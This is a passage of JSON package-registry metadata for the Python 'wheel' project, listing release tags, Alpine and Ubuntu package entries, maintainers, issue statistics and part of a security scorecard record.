ind":"commit","published_at":"2016-02-05T16:38:24.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.27.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.27.0/manifests"},{"name":"0.26.0","sha":"acb3cf8177034c014cfe90a691a850b5322951b5","kind":"commit","published_at":"2015-09-18T18:04:37.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.26.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.26.0/manifests"},{"name":"0.25.0","sha":"4b9fd6bf095c1b4427ed65ac19e4d5666a719f33","kind":"commit","published_at":"2015-09-17T00:34:49.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.25.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.25.0/manifests"},{"name":"0.24.0","sha":"cd0935c4fe92a15ea83057a9357347ae8d6a138e","kind":"commit","published_at":"2014-07-06T16:56:09.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.24.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.24.0/manifests"},{"name":"0.23.0","sha":"75c59f175c8cb2bfcb6660927232b40df1e149c4","kind":"commit","published_at":"2014-04-01T02:01:41.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.23.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.23.0/manifests"},{"name":"0.22.0","sha":"f1cc0b8a8601040b864e1e784e160744c7e3d965","kind":"commit","published_at":"2013-09-15T20:45:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.22.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.22.0/manifests"},{"name":"0.21.0","sha":"474826f4d64064e852b541f099fa69dcf5dd20fa","kind":"commit","published_at":"2013-07-20T16:19:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.21.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.21.0/manifests"},{"name":"0.16.0","sha":"f65ab72e2c6b04d10a4153807f473c9e9af421d5","kind":"commit","published_at":"2013-04-30T01:46:52.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.16.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.16.0/manifests"},{"name":"0.15.0","sha":"dffddb1d5af9e736fdd6192ca9256dc767bfab51","kind":"commit","published_at":"2012-11-16T14:06:00.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.15.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0/manifests"},{"name":"0.13.0","sha":"60fa189589155e43f33587f67eb44bb4fd7d5b58","kind":"commit","published_at":"2012-10-18T00:16:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.13.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0/manifests"},{"name":"0.12.0","sha":"2861596953a6ddfb2c4f052a46a2e2b4c5619245","kind":"commit","published_at":"2012-10-06T12:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.12.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0/manifests"},{"name":"0.11.0","sha":"8dd29d841e15596bc9b5d1c7f7576b2a66113f92","kind":"commit","published_at":"2012-10-06T12:18:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.11.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0/manifests"},{"name":"0.10.3","sha":"7021b0ee2a51e5d9447d06038db58e9e597625f7","kind":"commit","published_at":"2012-10-03T22:55:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3/manifests"},{"name":"0.10.2","sha":"126aaacc9f24fa69b6b74d4e742f645f6bb65cf3","kind":"commit","published_at":"2012-10-03T01:11:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2/manifests"},{"name":"0.10.1","sha":"92e52e6745ec6b1178c2f42585c2f37ab04902a8","kind":"commit","published_at":"2012-10-01T02:52:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1/manifests"},{"name":"0.10.0","sha":"9ee6da6d6cab3fa171f2704df5f934474acc4aae","kind":"commit","published_at":"2012-10-01T02:20:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0/manifests"},{"name":"0.9.7","sha":"a118f5845570ebaf6566b8075dc1dcaf117d7d43","kind":"commit","published_at":"2012-09-20T15:52:36.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7/manifests"},{"name":"0.9.6","sha":"0c4752551e4fa1d4e9786fc874ae97edf52c0369","kind":"commit","published_at":"2012-09-20T01:46:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6/manifests"},{"name":"0.9.4","sha":"8db2d0d4760a0886998e3fca4206f5db3230d223","kind":"commit","published_at":"2012-09-11T12:32:56.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4/manifests"},{"name":"0.9.3","sha":"ca65be72feaf5ebe92ef4c9e91bd722360c1ad2c","kind":"commit","published_at":"2012-09-11T02:38:10.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3/manifests"},{"name":"0.9.1","sha":"6952bc635deb0afdf36c5f325aa166636f1c2a52","kind":"commit","published_at":"2012-08-28T23:07:55.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1/manifests"},{"name":"0.9","sha":"49b1d5dac1cdeaf98998b1e5bdb0e2cf134edff3","kind":"commit","published_at":"2012-08-23T03:08:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9","html_url":"https://github.com/pypa/wheel/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9/manifests"},{"name":"0.7","sha":"b2930f5f5d3c898389bdbdd7c854a0b9d320cf14","kind":"commit","published_at":"2012-07-28T12:12:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7/manifests"},{"name":"0.6","sha":"bdf9d5747a724664bd3588ab471907a900b45c9a","kind":"commit","published_at":"2012-07-23T16:26:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6/manifests"},{"name":"0.5","sha":"d02f91dceda7c4a16cc26ea80f0eecfff638e4b2","kind":"commit","published_at":"2012-07-17T16:23:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5/manifests"}]},"repo_metadata_updated_at":"2025-10-30T04:12:44.187Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:apk/alpine/py3-wheel-pyc?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.21","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-wheel-pyc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-wheel-pyc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-wheel-pyc/dependencies","status":null,"funding_links":["https://github.com/sponsors/pypa"],"critical":null,"issue_metadata":{"last_synced_at":"2025-10-26T09:45:16.065Z","issues_count":109,"pull_requests_count":184,"avg_time_to_close_issue":48693272.43877551,"avg_time_to_close_pull_request":2636588.9515151517,"issues_closed_count":98,"pull_requests_closed_count":165,"pull_request_authors_count":37,"issue_authors_count":90,"avg_comments_per_issue":5.908256880733945,"avg_comments_per_pull_request":3.5217391304347827,"merged_pull_requests_count":140,"bot_issues_count":0,"bot_pull_requests_count":65,"past_year_issues_count":16,"past_year_pull_requests_count":34,"past_year_avg_time_to_close_issue":238596.63636363635,"past_year_avg_time_to_close_pull_request":890483.8846153846,"past_year_issues_closed_count":11,"past_year_pull_requests_closed_count":26,"past_year_pull_request_authors_count":11,"past_year_issue_authors_count":15,"past_year_avg_comments_per_issue":4.25,"past_year_avg_comments_per_pull_request":3.0588235294117645,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":8,"past_year_merged_pull_requests_count":23,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/issues","maintainers":[{"login":"jaraco","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"},{"login":"woodruffw","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/woodruffw"},{"login":"di","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/di"},{"login":"uranusjr","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/uranusjr"},{"login":"pradyunsg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pradyunsg"},{"login":"mayeut","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mayeut"},{"login":"alex","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alex"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages/py3-wheel-pyc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages/py3-wheel-pyc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages/py3-wheel-pyc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages/py3-wheel-pyc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages/py3-wheel-pyc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages/py3-wheel-pyc/codemeta","maintainers":[{"uuid":"santurysim@gmail.com","login":null,"name":"Peter Shkenev","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Peter Shkenev","packages_count":93,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Peter Shkenev","role":null,"created_at":"2024-12-13T17:52:12.759Z","updated_at":"2024-12-13T17:52:12.759Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/maintainers/santurysim@gmail.com/packages"}],"registry":{"name":"alpine-v3.21","url":"https://pkgs.alpinelinux.org/packages?branch=v3.21","ecosystem":"alpine","default":false,"packages_count":25393,"maintainers_count":413,"namespaces_count":2,"keywords_count":3612,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":1270},"icon_url":"https://github.com/alpinelinux.png","created_at":"2024-12-06T12:06:36.014Z","updated_at":"2026-06-10T05:18:33.774Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.21/namespaces"}},{"id":13785375,"name":"wheel","ecosystem":"ubuntu","description":null,"homepage":"https://github.com/pypa/wheel","licenses":null,"normalized_licenses":[],"repository_url":"https://github.com/pypa/wheel","keywords_array":["universe/misc"],"namespace":"universe","versions_count":1,"first_release_published_at":"2026-02-13T14:23:32.165Z","latest_release_published_at":"2026-02-13T14:23:32.165Z","latest_release_number":"0.37.1-2","last_synced_at":"2026-03-13T16:35:05.875Z","created_at":"2026-02-13T14:23:31.987Z","updated_at":"2026-03-13T16:35:05.875Z","registry_url":"https://launchpad.net/ubuntu/+source/wheel","install_command":"apt-get install wheel","documentation_url":null,"metadata":{"component":"universe","architecture":"all","priority":"optional","binary":"python3-wheel, python-wheel-common, python3-wheel-whl","standards_version":"4.6.0","maintainer":"Debian Python Team \u003cteam+python@tracker.debian.org\u003e","build_depends":"debhelper-compat (= 12), dh-python, python3-all-dev, python3-pytest, python3-pytest-cov, python3-setuptools, python3-sphinx, tox","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{},"repo_metadata_updated_at":"2026-02-13T14:23:48.830Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/ubuntu/wheel?arch=source\u0026distro=ubuntu-22.04\u0026repository_url=https://launchpad.net/ubuntu/jammy","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/ubuntu/wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/ubuntu/wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/ubuntu/wheel/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-22.04/packages/wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-22.04/packages/wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-22.04/packages/wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-22.04/packages/wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-22.04/packages/wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-22.04/packages/wheel/codemeta","maintainers":[],"registry":{"name":"ubuntu-22.04","url":"https://launchpad.net/ubuntu/jammy","ecosystem":"ubuntu","default":false,"packages_count":34289,"maintainers_count":0,"namespaces_count":4,"keywords_count":1523,"github":"ubuntu","metadata":{"codename":"jammy","funded_packages_count":167},"icon_url":"https://github.com/ubuntu.png","created_at":"2026-02-04T11:01:46.486Z","updated_at":"2026-06-10T05:17:45.610Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-22.04/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-22.04/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-22.04/namespaces"}},{"id":12992989,"name":"py3-wheel-pyc","ecosystem":"alpine","description":"Precompiled Python bytecode for py3-wheel","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":[],"namespace":"main","versions_count":2,"first_release_published_at":"2025-05-05T11:24:02.000Z","latest_release_published_at":"2026-03-03T23:09:10.000Z","latest_release_number":"0.46.3-r0","last_synced_at":"2026-03-09T00:05:19.483Z","created_at":"2026-01-30T19:34:03.933Z","updated_at":"2026-03-09T00:05:19.483Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.23/main/x86_64/py3-wheel-pyc","install_command":"apk add py3-wheel-pyc","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{},"repo_metadata_updated_at":null,"dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:apk/alpine/py3-wheel-pyc?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.23","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-wheel-pyc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-wheel-pyc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-wheel-pyc/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages/py3-wheel-pyc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages/py3-wheel-pyc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages/py3-wheel-pyc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages/py3-wheel-pyc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages/py3-wheel-pyc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages/py3-wheel-pyc/codemeta","maintainers":[{"uuid":"santurysim@gmail.com","login":null,"name":"Peter Shkenev","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=Peter Shkenev","packages_count":107,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=Peter Shkenev","role":null,"created_at":"2026-03-03T23:19:36.705Z","updated_at":"2026-03-03T23:19:36.705Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/maintainers/santurysim@gmail.com/packages"}],"registry":{"name":"alpine-v3.23","url":"https://pkgs.alpinelinux.org/packages?branch=v3.23","ecosystem":"alpine","default":false,"packages_count":27574,"maintainers_count":428,"namespaces_count":2,"keywords_count":181,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":104},"icon_url":"https://github.com/alpinelinux.png","created_at":"2026-01-24T14:35:50.739Z","updated_at":"2026-06-10T05:17:06.512Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.23/namespaces"}},{"id":7767318,"name":"py3-wheel-doc","ecosystem":"alpine","description":"built-package format for Python (documentation)","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":[],"namespace":"main","versions_count":1,"first_release_published_at":"2023-04-18T16:39:19.000Z","latest_release_published_at":"2023-04-18T16:39:19.000Z","latest_release_number":"0.40.0-r1","last_synced_at":"2026-04-09T03:02:40.126Z","created_at":"2023-05-22T11:24:33.165Z","updated_at":"2026-04-09T03:02:40.127Z","registry_url":"https://pkgs.alpinelinux.org/package/v3.18/main/x86_64/py3-wheel-doc","install_command":"apk add py3-wheel-doc","documentation_url":null,"metadata":{"repository":"main","architecture":"x86_64"},"repo_metadata":{"id":23174547,"uuid":"98346885","full_name":"pypa/wheel","owner":"pypa","description":"The official binary distribution format for Python","archived":false,"fork":false,"pushed_at":"2025-10-06T19:13:50.000Z","size":1827,"stargazers_count":539,"open_issues_count":14,"forks_count":171,"subscribers_count":30,"default_branch":"main","last_synced_at":"2025-10-30T00:35:00.752Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pypa.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-07-25T20:24:25.000Z","updated_at":"2025-10-29T13:00:22.000Z","dependencies_parsed_at":"2024-02-03T11:27:24.404Z","dependency_job_id":"c444d7cc-5eb9-412d-b647-9474b7b4096f","html_url":"https://github.com/pypa/wheel","commit_stats":{"total_commits":913,"total_committers":82,"mean_commits":"11.134146341463415","dds":0.6297918948521358,"last_synced_commit":"baf6bf89562cb42a0ca71cc1e804600b161952eb"},"previous_names":[],"tags_count":68,"template":false,"template_full_name":null,"purl":"pkg:github/pypa/wheel","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/sbom","scorecard":{"id":751706,"data":{"date":"2025-08-11","repo":{"name":"github.com/pypa/wheel","commit":"15b7577654e8bcd23e009c6bac036b65c11d8d8f"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5,"checks":[{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous 